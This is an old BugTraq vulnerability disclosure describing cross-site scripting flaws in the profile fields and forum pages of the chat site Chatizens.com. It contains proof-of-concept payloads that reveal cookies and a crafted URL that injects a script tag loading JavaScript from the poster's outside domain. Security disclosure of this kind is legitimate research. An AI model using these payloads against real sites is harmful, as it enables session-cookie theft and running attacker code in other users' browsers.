BugTraq
Chatizens.com - XSS with cookie disclosure Jun 16 2006 12:08AM
luny youfucktard com
Chatizens.com Also known as Chattown.com

Homepage:

http://www.chatizens.com

Affected files:

* Profile input boxes:

All input boxes of your profile.

* Browsing the forums

--------------------------------------------

XSS vuln with cookie disclosure via profile input boxes.

To bypass chatizens filters of adding backslashes to ' and ", we use the long UFT-8 unicode of '. PoC:

<img src=javascript:alert('XSS')>

And to display our cookie:

<IMG SRC=javascript:alert(document.cookie)>

Screenshot:

http://www.youfucktard.com/xsp/chatizen1.jpg

http://www.youfucktard.com/xsp/chatizen2.jpg

---------------------------------------------

heh, it seems chatizens.com is using a webapp I auditing before, Alstrasoft E-Friends.

Screenshot:

http://www.youfucktard.com/xsp/chatizen3.jpg

-------------------------------------------

XSS vuln via viewing forum categories:

http://chatizens.com/friends/index.php?mode=forums&act=viewcat&seid=19">
">">'><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><""><'<"

Screenshot:

http://www.youfucktard.com/xsp/chatizen4.jpg

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus